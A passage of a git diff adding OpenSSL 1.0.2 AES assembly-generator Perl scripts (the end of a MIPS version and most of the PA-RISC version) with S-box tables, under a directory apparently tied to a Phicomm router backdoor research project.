+.byte	0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16
+.byte	0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92
+.byte	0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda
+.byte	0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84
+.byte	0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a
+.byte	0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06
+.byte	0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02
+.byte	0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b
+.byte	0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea
+.byte	0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73
+.byte	0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85
+.byte	0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e
+.byte	0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89
+.byte	0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b
+.byte	0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20
+.byte	0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4
+.byte	0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31
+.byte	0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f
+.byte	0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d
+.byte	0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef
+.byte	0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0
+.byte	0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61
+.byte	0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26
+.byte	0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d
+
+AES_Te4:
+.byte	0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5	# Te4
+.byte	0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76
+.byte	0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0
+.byte	0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0
+.byte	0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc
+.byte	0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15
+.byte	0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a
+.byte	0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75
+.byte	0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0
+.byte	0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84
+.byte	0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b
+.byte	0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf
+.byte	0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85
+.byte	0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8
+.byte	0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5
+.byte	0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2
+.byte	0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17
+.byte	0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73
+.byte	0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88
+.byte	0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb
+.byte	0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c
+.byte	0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79
+.byte	0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9
+.byte	0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08
+.byte	0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6
+.byte	0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a
+.byte	0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e
+.byte	0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e
+.byte	0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94
+.byte	0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf
+.byte	0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68
+.byte	0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16
+
+.byte	0x01,0x00,0x00,0x00,	0x02,0x00,0x00,0x00	# rcon
+.byte	0x04,0x00,0x00,0x00,	0x08,0x00,0x00,0x00
+.byte	0x10,0x00,0x00,0x00,	0x20,0x00,0x00,0x00
+.byte	0x40,0x00,0x00,0x00,	0x80,0x00,0x00,0x00
+.byte	0x1B,0x00,0x00,0x00,	0x36,0x00,0x00,0x00
+___
+
+foreach (split("\n",$code)) {
+	s/\`([^\`]*)\`/eval $1/ge;
+
+	# made-up _instructions, _xtr, _ins, _ror and _bias, cope
+	# with byte order dependencies...
+	if (/^\s+_/) {
+	    s/(_[a-z]+\s+)(\$[0-9]+),([^,]+)(#.*)*$/$1$2,$2,$3/;
+
+	    s/_xtr\s+(\$[0-9]+),(\$[0-9]+),([0-9]+(\-2)*)/
+		sprintf("srl\t$1,$2,%d",$big_endian ?	eval($3)
+					:		eval("24-$3"))/e or
+	    s/_ins\s+(\$[0-9]+),(\$[0-9]+),([0-9]+)/
+		sprintf("sll\t$1,$2,%d",$big_endian ?	eval($3)
+					:		eval("24-$3"))/e or
+	    s/_ins2\s+(\$[0-9]+),(\$[0-9]+),([0-9]+)/
+		sprintf("ins\t$1,$2,%d,8",$big_endian ?	eval($3)
+					:		eval("24-$3"))/e or
+	    s/_ror\s+(\$[0-9]+),(\$[0-9]+),(\-?[0-9]+)/
+		sprintf("srl\t$1,$2,%d",$big_endian ?	eval($3)
+					:		eval("$3*-1"))/e or
+	    s/_bias\s+(\$[0-9]+),(\$[0-9]+),([0-9]+)/
+		sprintf("sll\t$1,$2,%d",$big_endian ?	eval($3)
+					:		eval("($3-16)&31"))/e;
+
+	    s/srl\s+(\$[0-9]+),(\$[0-9]+),\-([0-9]+)/
+		sprintf("sll\t$1,$2,$3")/e				or
+	    s/srl\s+(\$[0-9]+),(\$[0-9]+),0/
+		sprintf("and\t$1,$2,0xff")/e				or
+	    s/(sll\s+\$[0-9]+,\$[0-9]+,0)/#$1/;
+	}
+
+	# convert lwl/lwr and swr/swl to little-endian order
+	if (!$big_endian && /^\s+[sl]w[lr]\s+/) {
+	    s/([sl]wl.*)([0-9]+)\((\$[0-9]+)\)/
+		sprintf("$1%d($3)",eval("$2-$2%4+($2%4-1)&3"))/e	or
+	    s/([sl]wr.*)([0-9]+)\((\$[0-9]+)\)/
+		sprintf("$1%d($3)",eval("$2-$2%4+($2%4+1)&3"))/e;
+	}
+
+	if (!$big_endian) {
+	    s/(rotr\s+\$[0-9]+,\$[0-9]+),([0-9]+)/sprintf("$1,%d",32-$2)/e;
+	    s/(ext\s+\$[0-9]+,\$[0-9]+),([0-9]+),8/sprintf("$1,%d,8",24-$2)/e;
+	}
+
+	print $_,"\n";
+}
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-parisc.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-parisc.pl
new file mode 100644
index 0000000..714dcfb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-parisc.pl
@@ -0,0 +1,1022 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# AES for PA-RISC.
+#
+# June 2009.
+#
+# The module is mechanical transliteration of aes-sparcv9.pl, but with
+# a twist: S-boxes are compressed even further down to 1K+256B. On
+# PA-7100LC performance is ~40% better than gcc 3.2 generated code and
+# is about 33 cycles per byte processed with 128-bit key. Newer CPUs
+# perform at 16 cycles per byte. It's not faster than code generated
+# by vendor compiler, but recall that it has compressed S-boxes, which
+# requires extra processing.
+#
+# Special thanks to polarhome.com for providing HP-UX account.
+
+$flavour = shift;
+$output = shift;
+open STDOUT,">$output";
+
+if ($flavour =~ /64/) {
+	$LEVEL		="2.0W";
+	$SIZE_T		=8;
+	$FRAME_MARKER	=80;
+	$SAVED_RP	=16;
+	$PUSH		="std";
+	$PUSHMA		="std,ma";
+	$POP		="ldd";
+	$POPMB		="ldd,mb";
+} else {
+	$LEVEL		="1.0";
+	$SIZE_T		=4;
+	$FRAME_MARKER	=48;
+	$SAVED_RP	=20;
+	$PUSH		="stw";
+	$PUSHMA		="stwm";
+	$POP		="ldw";
+	$POPMB		="ldwm";
+}
+
+$FRAME=16*$SIZE_T+$FRAME_MARKER;# 16 saved regs + frame marker
+				#                 [+ argument transfer]
+$inp="%r26";	# arg0
+$out="%r25";	# arg1
+$key="%r24";	# arg2
+
+($s0,$s1,$s2,$s3) = ("%r1","%r2","%r3","%r4");
+($t0,$t1,$t2,$t3) = ("%r5","%r6","%r7","%r8");
+
+($acc0, $acc1, $acc2, $acc3, $acc4, $acc5, $acc6, $acc7,
+ $acc8, $acc9,$acc10,$acc11,$acc12,$acc13,$acc14,$acc15) =
+("%r9","%r10","%r11","%r12","%r13","%r14","%r15","%r16",
+"%r17","%r18","%r19","%r20","%r21","%r22","%r23","%r26");
+
+$tbl="%r28";
+$rounds="%r29";
+
+$code=<<___;
+	.LEVEL	$LEVEL
+	.SPACE	\$TEXT\$
+	.SUBSPA	\$CODE\$,QUAD=0,ALIGN=8,ACCESS=0x2C,CODE_ONLY
+
+	.EXPORT	AES_encrypt,ENTRY,ARGW0=GR,ARGW1=GR,ARGW2=GR
+	.ALIGN	64
+AES_encrypt
+	.PROC
+	.CALLINFO	FRAME=`$FRAME-16*$SIZE_T`,NO_CALLS,SAVE_RP,ENTRY_GR=18
+	.ENTRY
+	$PUSH	%r2,-$SAVED_RP(%sp)	; standard prologue
+	$PUSHMA	%r3,$FRAME(%sp)
+	$PUSH	%r4,`-$FRAME+1*$SIZE_T`(%sp)
+	$PUSH	%r5,`-$FRAME+2*$SIZE_T`(%sp)
+	$PUSH	%r6,`-$FRAME+3*$SIZE_T`(%sp)
+	$PUSH	%r7,`-$FRAME+4*$SIZE_T`(%sp)
+	$PUSH	%r8,`-$FRAME+5*$SIZE_T`(%sp)
+	$PUSH	%r9,`-$FRAME+6*$SIZE_T`(%sp)
+	$PUSH	%r10,`-$FRAME+7*$SIZE_T`(%sp)
+	$PUSH	%r11,`-$FRAME+8*$SIZE_T`(%sp)
+	$PUSH	%r12,`-$FRAME+9*$SIZE_T`(%sp)
+	$PUSH	%r13,`-$FRAME+10*$SIZE_T`(%sp)
+	$PUSH	%r14,`-$FRAME+11*$SIZE_T`(%sp)
+	$PUSH	%r15,`-$FRAME+12*$SIZE_T`(%sp)
+	$PUSH	%r16,`-$FRAME+13*$SIZE_T`(%sp)
+	$PUSH	%r17,`-$FRAME+14*$SIZE_T`(%sp)
+	$PUSH	%r18,`-$FRAME+15*$SIZE_T`(%sp)
+
+	blr	%r0,$tbl
+	ldi	3,$t0
+L\$enc_pic
+	andcm	$tbl,$t0,$tbl
+	ldo	L\$AES_Te-L\$enc_pic($tbl),$tbl
+
+	and	$inp,$t0,$t0
+	sub	$inp,$t0,$inp
+	ldw	0($inp),$s0
+	ldw	4($inp),$s1
+	ldw	8($inp),$s2
+	comib,=	0,$t0,L\$enc_inp_aligned
+	ldw	12($inp),$s3
+
+	sh3addl	$t0,%r0,$t0
+	subi	32,$t0,$t0
+	mtctl	$t0,%cr11
+	ldw	16($inp),$t1
+	vshd	$s0,$s1,$s0
+	vshd	$s1,$s2,$s1
+	vshd	$s2,$s3,$s2
+	vshd	$s3,$t1,$s3
+
+L\$enc_inp_aligned
+	bl	_parisc_AES_encrypt,%r31
+	nop
+
+	extru,<> $out,31,2,%r0
+	b	L\$enc_out_aligned
+	nop
+
+	_srm	$s0,24,$acc0
+	_srm	$s0,16,$acc1
+	stb	$acc0,0($out)
+	_srm	$s0,8,$acc2
+	stb	$acc1,1($out)
+	_srm	$s1,24,$acc4
+	stb	$acc2,2($out)
+	_srm	$s1,16,$acc5
+	stb	$s0,3($out)
+	_srm	$s1,8,$acc6
+	stb	$acc4,4($out)
+	_srm	$s2,24,$acc0
+	stb	$acc5,5($out)
+	_srm	$s2,16,$acc1
+	stb	$acc6,6($out)
+	_srm	$s2,8,$acc2
+	stb	$s1,7($out)
+	_srm	$s3,24,$acc4
+	stb	$acc0,8($out)
+	_srm	$s3,16,$acc5
+	stb	$acc1,9($out)
+	_srm	$s3,8,$acc6
+	stb	$acc2,10($out)
+	stb	$s2,11($out)
+	stb	$acc4,12($out)
+	stb	$acc5,13($out)
+	stb	$acc6,14($out)
+	b	L\$enc_done
+	stb	$s3,15($out)
+
+L\$enc_out_aligned
+	stw	$s0,0($out)
+	stw	$s1,4($out)
+	stw	$s2,8($out)
+	stw	$s3,12($out)
+
+L\$enc_done
+	$POP	`-$FRAME-$SAVED_RP`(%sp),%r2	; standard epilogue
+	$POP	`-$FRAME+1*$SIZE_T`(%sp),%r4
+	$POP	`-$FRAME+2*$SIZE_T`(%sp),%r5
+	$POP	`-$FRAME+3*$SIZE_T`(%sp),%r6
+	$POP	`-$FRAME+4*$SIZE_T`(%sp),%r7
+	$POP	`-$FRAME+5*$SIZE_T`(%sp),%r8
+	$POP	`-$FRAME+6*$SIZE_T`(%sp),%r9
+	$POP	`-$FRAME+7*$SIZE_T`(%sp),%r10
+	$POP	`-$FRAME+8*$SIZE_T`(%sp),%r11
+	$POP	`-$FRAME+9*$SIZE_T`(%sp),%r12
+	$POP	`-$FRAME+10*$SIZE_T`(%sp),%r13
+	$POP	`-$FRAME+11*$SIZE_T`(%sp),%r14
+	$POP	`-$FRAME+12*$SIZE_T`(%sp),%r15
+	$POP	`-$FRAME+13*$SIZE_T`(%sp),%r16
+	$POP	`-$FRAME+14*$SIZE_T`(%sp),%r17
+	$POP	`-$FRAME+15*$SIZE_T`(%sp),%r18
+	bv	(%r2)
+	.EXIT
+	$POPMB	-$FRAME(%sp),%r3
+	.PROCEND
+
+	.ALIGN	16
+_parisc_AES_encrypt
+	.PROC
+	.CALLINFO	MILLICODE
+	.ENTRY
+	ldw	240($key),$rounds
+	ldw	0($key),$t0
+	ldw	4($key),$t1
+	ldw	8($key),$t2
+	_srm	$rounds,1,$rounds
+	xor	$t0,$s0,$s0
+	ldw	12($key),$t3
+	_srm	$s0,24,$acc0
+	xor	$t1,$s1,$s1
+	ldw	16($key),$t0
+	_srm	$s1,16,$acc1
+	xor	$t2,$s2,$s2
+	ldw	20($key),$t1
+	xor	$t3,$s3,$s3
+	ldw	24($key),$t2
+	ldw	28($key),$t3
+L\$enc_loop
+	_srm	$s2,8,$acc2
+	ldwx,s	$acc0($tbl),$acc0
+	_srm	$s3,0,$acc3
+	ldwx,s	$acc1($tbl),$acc1
+	_srm	$s1,24,$acc4
+	ldwx,s	$acc2($tbl),$acc2
+	_srm	$s2,16,$acc5
+	ldwx,s	$acc3($tbl),$acc3
+	_srm	$s3,8,$acc6
+	ldwx,s	$acc4($tbl),$acc4
+	_srm	$s0,0,$acc7
+	ldwx,s	$acc5($tbl),$acc5
+	_srm	$s2,24,$acc8
+	ldwx,s	$acc6($tbl),$acc6
+	_srm	$s3,16,$acc9
+	ldwx,s	$acc7($tbl),$acc7
+	_srm	$s0,8,$acc10
+	ldwx,s	$acc8($tbl),$acc8
+	_srm	$s1,0,$acc11
+	ldwx,s	$acc9($tbl),$acc9
+	_srm	$s3,24,$acc12
+	ldwx,s	$acc10($tbl),$acc10
+	_srm	$s0,16,$acc13
+	ldwx,s	$acc11($tbl),$acc11
+	_srm	$s1,8,$acc14
+	ldwx,s	$acc12($tbl),$acc12
+	_srm	$s2,0,$acc15
+	ldwx,s	$acc13($tbl),$acc13
+	ldwx,s	$acc14($tbl),$acc14
+	ldwx,s	$acc15($tbl),$acc15
+	addib,= -1,$rounds,L\$enc_last
+	ldo	32($key),$key
+
+		_ror	$acc1,8,$acc1
+		xor	$acc0,$t0,$t0
+	ldw	0($key),$s0
+		_ror	$acc2,16,$acc2
+		xor	$acc1,$t0,$t0
+	ldw	4($key),$s1
+		_ror	$acc3,24,$acc3
+		xor	$acc2,$t0,$t0
+	ldw	8($key),$s2
+		_ror	$acc5,8,$acc5
+		xor	$acc3,$t0,$t0
+	ldw	12($key),$s3
+		_ror	$acc6,16,$acc6
+		xor	$acc4,$t1,$t1
+		_ror	$acc7,24,$acc7
+		xor	$acc5,$t1,$t1
+		_ror	$acc9,8,$acc9
+		xor	$acc6,$t1,$t1
+		_ror	$acc10,16,$acc10
+		xor	$acc7,$t1,$t1
+		_ror	$acc11,24,$acc11
+		xor	$acc8,$t2,$t2
+		_ror	$acc13,8,$acc13
+		xor	$acc9,$t2,$t2
+		_ror	$acc14,16,$acc14
+		xor	$acc10,$t2,$t2
+		_ror	$acc15,24,$acc15
+		xor	$acc11,$t2,$t2
+		xor	$acc12,$acc14,$acc14
+		xor	$acc13,$t3,$t3
+	_srm	$t0,24,$acc0
+		xor	$acc14,$t3,$t3
+	_srm	$t1,16,$acc1
+		xor	$acc15,$t3,$t3
+
+	_srm	$t2,8,$acc2
+	ldwx,s	$acc0($tbl),$acc0
+	_srm	$t3,0,$acc3
+	ldwx,s	$acc1($tbl),$acc1
+	_srm	$t1,24,$acc4
+	ldwx,s	$acc2($tbl),$acc2
+	_srm	$t2,16,$acc5
+	ldwx,s	$acc3($tbl),$acc3
+	_srm	$t3,8,$acc6
+	ldwx,s	$acc4($tbl),$acc4
+	_srm	$t0,0,$acc7
+	ldwx,s	$acc5($tbl),$acc5
+	_srm	$t2,24,$acc8
+	ldwx,s	$acc6($tbl),$acc6
+	_srm	$t3,16,$acc9
+	ldwx,s	$acc7($tbl),$acc7
+	_srm	$t0,8,$acc10
+	ldwx,s	$acc8($tbl),$acc8
+	_srm	$t1,0,$acc11
+	ldwx,s	$acc9($tbl),$acc9
+	_srm	$t3,24,$acc12
+	ldwx,s	$acc10($tbl),$acc10
+	_srm	$t0,16,$acc13
+	ldwx,s	$acc11($tbl),$acc11
+	_srm	$t1,8,$acc14
+	ldwx,s	$acc12($tbl),$acc12
+	_srm	$t2,0,$acc15
+	ldwx,s	$acc13($tbl),$acc13
+		_ror	$acc1,8,$acc1
+	ldwx,s	$acc14($tbl),$acc14
+
+		_ror	$acc2,16,$acc2
+		xor	$acc0,$s0,$s0
+	ldwx,s	$acc15($tbl),$acc15
+		_ror	$acc3,24,$acc3
+		xor	$acc1,$s0,$s0
+	ldw	16($key),$t0
+		_ror	$acc5,8,$acc5
+		xor	$acc2,$s0,$s0
+	ldw	20($key),$t1
+		_ror	$acc6,16,$acc6
+		xor	$acc3,$s0,$s0
+	ldw	24($key),$t2
+		_ror	$acc7,24,$acc7
+		xor	$acc4,$s1,$s1
+	ldw	28($key),$t3
+		_ror	$acc9,8,$acc9
+		xor	$acc5,$s1,$s1
+	ldw	1024+0($tbl),%r0		; prefetch te4
+		_ror	$acc10,16,$acc10
+		xor	$acc6,$s1,$s1
+	ldw	1024+32($tbl),%r0		; prefetch te4
+		_ror	$acc11,24,$acc11
+		xor	$acc7,$s1,$s1
+	ldw	1024+64($tbl),%r0		; prefetch te4
+		_ror	$acc13,8,$acc13
+		xor	$acc8,$s2,$s2
+	ldw	1024+96($tbl),%r0		; prefetch te4
+		_ror	$acc14,16,$acc14
+		xor	$acc9,$s2,$s2
+	ldw	1024+128($tbl),%r0		; prefetch te4
+		_ror	$acc15,24,$acc15
+		xor	$acc10,$s2,$s2
+	ldw	1024+160($tbl),%r0		; prefetch te4
+	_srm	$s0,24,$acc0
+		xor	$acc11,$s2,$s2
+	ldw	1024+192($tbl),%r0		; prefetch te4
+		xor	$acc12,$acc14,$acc14
+		xor	$acc13,$s3,$s3
+	ldw	1024+224($tbl),%r0		; prefetch te4
+	_srm	$s1,16,$acc1
+		xor	$acc14,$s3,$s3
+	b	L\$enc_loop
+		xor	$acc15,$s3,$s3
+
+	.ALIGN	16
+L\$enc_last
+	ldo	1024($tbl),$rounds
+		_ror	$acc1,8,$acc1
+		xor	$acc0,$t0,$t0
+	ldw	0($key),$s0
+		_ror	$acc2,16,$acc2
+		xor	$acc1,$t0,$t0
+	ldw	4($key),$s1
+		_ror	$acc3,24,$acc3
+		xor	$acc2,$t0,$t0
+	ldw	8($key),$s2
+		_ror	$acc5,8,$acc5
+		xor	$acc3,$t0,$t0
+	ldw	12($key),$s3
+		_ror	$acc6,16,$acc6
+		xor	$acc4,$t1,$t1
+		_ror	$acc7,24,$acc7
+		xor	$acc5,$t1,$t1
+		_ror	$acc9,8,$acc9
+		xor	$acc6,$t1,$t1
+		_ror	$acc10,16,$acc10
+		xor	$acc7,$t1,$t1
+		_ror	$acc11,24,$acc11
+		xor	$acc8,$t2,$t2
+		_ror	$acc13,8,$acc13
+		xor	$acc9,$t2,$t2
+		_ror	$acc14,16,$acc14
+		xor	$acc10,$t2,$t2
+		_ror	$acc15,24,$acc15
+		xor	$acc11,$t2,$t2
+		xor	$acc12,$acc14,$acc14
+		xor	$acc13,$t3,$t3
+	_srm	$t0,24,$acc0
+		xor	$acc14,$t3,$t3
+	_srm	$t1,16,$acc1
+		xor	$acc15,$t3,$t3
+
+	_srm	$t2,8,$acc2
+	ldbx	$acc0($rounds),$acc0
+	_srm	$t1,24,$acc4
+	ldbx	$acc1($rounds),$acc1
+	_srm	$t2,16,$acc5
+	_srm	$t3,0,$acc3
+	ldbx	$acc2($rounds),$acc2
+	ldbx	$acc3($rounds),$acc3
+	_srm	$t3,8,$acc6
+	ldbx	$acc4($rounds),$acc4
+	_srm	$t2,24,$acc8
+	ldbx	$acc5($rounds),$acc5
+	_srm	$t3,16,$acc9
+	_srm	$t0,0,$acc7
+	ldbx	$acc6($rounds),$acc6
+	ldbx	$acc7($rounds),$acc7
+	_srm	$t0,8,$acc10
+	ldbx	$acc8($rounds),$acc8
+	_srm	$t3,24,$acc12
+	ldbx	$acc9($rounds),$acc9
+	_srm	$t0,16,$acc13
+	_srm	$t1,0,$acc11
+	ldbx	$acc10($rounds),$acc10
+	_srm	$t1,8,$acc14
+	ldbx	$acc11($rounds),$acc11
+	ldbx	$acc12($rounds),$acc12
+	ldbx	$acc13($rounds),$acc13
+	_srm	$t2,0,$acc15
+	ldbx	$acc14($rounds),$acc14
+
+		dep	$acc0,7,8,$acc3
+	ldbx	$acc15($rounds),$acc15
+		dep	$acc4,7,8,$acc7
+		dep	$acc1,15,8,$acc3
+		dep	$acc5,15,8,$acc7
+		dep	$acc2,23,8,$acc3
+		dep	$acc6,23,8,$acc7
+		xor	$acc3,$s0,$s0
+		xor	$acc7,$s1,$s1
+		dep	$acc8,7,8,$acc11
+		dep	$acc12,7,8,$acc15
+		dep	$acc9,15,8,$acc11
+		dep	$acc13,15,8,$acc15
+		dep	$acc10,23,8,$acc11
+		dep	$acc14,23,8,$acc15
+		xor	$acc11,$s2,$s2
+
+	bv	(%r31)
+	.EXIT
+		xor	$acc15,$s3,$s3
+	.PROCEND
+
+	.ALIGN	64
+L\$AES_Te
+	.WORD	0xc66363a5, 0xf87c7c84, 0xee777799, 0xf67b7b8d
+	.WORD	0xfff2f20d, 0xd66b6bbd, 0xde6f6fb1, 0x91c5c554
+	.WORD	0x60303050, 0x02010103, 0xce6767a9, 0x562b2b7d
+	.WORD	0xe7fefe19, 0xb5d7d762, 0x4dababe6, 0xec76769a
+	.WORD	0x8fcaca45, 0x1f82829d, 0x89c9c940, 0xfa7d7d87
+	.WORD	0xeffafa15, 0xb25959eb, 0x8e4747c9, 0xfbf0f00b
+	.WORD	0x41adadec, 0xb3d4d467, 0x5fa2a2fd, 0x45afafea
+	.WORD	0x239c9cbf, 0x53a4a4f7, 0xe4727296, 0x9bc0c05b
+	.WORD	0x75b7b7c2, 0xe1fdfd1c, 0x3d9393ae, 0x4c26266a
+	.WORD	0x6c36365a, 0x7e3f3f41, 0xf5f7f702, 0x83cccc4f
+	.WORD	0x6834345c, 0x51a5a5f4, 0xd1e5e534, 0xf9f1f108
+	.WORD	0xe2717193, 0xabd8d873, 0x62313153, 0x2a15153f
+	.WORD	0x0804040c, 0x95c7c752, 0x46232365, 0x9dc3c35e
+	.WORD	0x30181828, 0x379696a1, 0x0a05050f, 0x2f9a9ab5
+	.WORD	0x0e070709, 0x24121236, 0x1b80809b, 0xdfe2e23d
+	.WORD	0xcdebeb26, 0x4e272769, 0x7fb2b2cd, 0xea75759f
+	.WORD	0x1209091b, 0x1d83839e, 0x582c2c74, 0x341a1a2e
+	.WORD	0x361b1b2d, 0xdc6e6eb2, 0xb45a5aee, 0x5ba0a0fb
+	.WORD	0xa45252f6, 0x763b3b4d, 0xb7d6d661, 0x7db3b3ce
+	.WORD	0x5229297b, 0xdde3e33e, 0x5e2f2f71, 0x13848497
+	.WORD	0xa65353f5, 0xb9d1d168, 0x00000000, 0xc1eded2c
+	.WORD	0x40202060, 0xe3fcfc1f, 0x79b1b1c8, 0xb65b5bed
+	.WORD	0xd46a6abe, 0x8dcbcb46, 0x67bebed9, 0x7239394b
+	.WORD	0x944a4ade, 0x984c4cd4, 0xb05858e8, 0x85cfcf4a
+	.WORD	0xbbd0d06b, 0xc5efef2a, 0x4faaaae5, 0xedfbfb16
+	.WORD	0x864343c5, 0x9a4d4dd7, 0x66333355, 0x11858594
+	.WORD	0x8a4545cf, 0xe9f9f910, 0x04020206, 0xfe7f7f81
+	.WORD	0xa05050f0, 0x783c3c44, 0x259f9fba, 0x4ba8a8e3
+	.WORD	0xa25151f3, 0x5da3a3fe, 0x804040c0, 0x058f8f8a
+	.WORD	0x3f9292ad, 0x219d9dbc, 0x70383848, 0xf1f5f504
+	.WORD	0x63bcbcdf, 0x77b6b6c1, 0xafdada75, 0x42212163
+	.WORD	0x20101030, 0xe5ffff1a, 0xfdf3f30e, 0xbfd2d26d
+	.WORD	0x81cdcd4c, 0x180c0c14, 0x26131335, 0xc3ecec2f
+	.WORD	0xbe5f5fe1, 0x359797a2, 0x884444cc, 0x2e171739
+	.WORD	0x93c4c457, 0x55a7a7f2, 0xfc7e7e82, 0x7a3d3d47
+	.WORD	0xc86464ac, 0xba5d5de7, 0x3219192b, 0xe6737395
+	.WORD	0xc06060a0, 0x19818198, 0x9e4f4fd1, 0xa3dcdc7f
+	.WORD	0x44222266, 0x542a2a7e, 0x3b9090ab, 0x0b888883
+	.WORD	0x8c4646ca, 0xc7eeee29, 0x6bb8b8d3, 0x2814143c
+	.WORD	0xa7dede79, 0xbc5e5ee2, 0x160b0b1d, 0xaddbdb76
+	.WORD	0xdbe0e03b, 0x64323256, 0x743a3a4e, 0x140a0a1e
+	.WORD	0x924949db, 0x0c06060a, 0x4824246c, 0xb85c5ce4
+	.WORD	0x9fc2c25d, 0xbdd3d36e, 0x43acacef, 0xc46262a6
+	.WORD	0x399191a8, 0x319595a4, 0xd3e4e437, 0xf279798b
+	.WORD	0xd5e7e732, 0x8bc8c843, 0x6e373759, 0xda6d6db7
+	.WORD	0x018d8d8c, 0xb1d5d564, 0x9c4e4ed2, 0x49a9a9e0
+	.WORD	0xd86c6cb4, 0xac5656fa, 0xf3f4f407, 0xcfeaea25
+	.WORD	0xca6565af, 0xf47a7a8e, 0x47aeaee9, 0x10080818
+	.WORD	0x6fbabad5, 0xf0787888, 0x4a25256f, 0x5c2e2e72
+	.WORD	0x381c1c24, 0x57a6a6f1, 0x73b4b4c7, 0x97c6c651
+	.WORD	0xcbe8e823, 0xa1dddd7c, 0xe874749c, 0x3e1f1f21
+	.WORD	0x964b4bdd, 0x61bdbddc, 0x0d8b8b86, 0x0f8a8a85
+	.WORD	0xe0707090, 0x7c3e3e42, 0x71b5b5c4, 0xcc6666aa
+	.WORD	0x904848d8, 0x06030305, 0xf7f6f601, 0x1c0e0e12
+	.WORD	0xc26161a3, 0x6a35355f, 0xae5757f9, 0x69b9b9d0
+	.WORD	0x17868691, 0x99c1c158, 0x3a1d1d27, 0x279e9eb9
+	.WORD	0xd9e1e138, 0xebf8f813, 0x2b9898b3, 0x22111133
+	.WORD	0xd26969bb, 0xa9d9d970, 0x078e8e89, 0x339494a7
+	.WORD	0x2d9b9bb6, 0x3c1e1e22, 0x15878792, 0xc9e9e920
+	.WORD	0x87cece49, 0xaa5555ff, 0x50282878, 0xa5dfdf7a
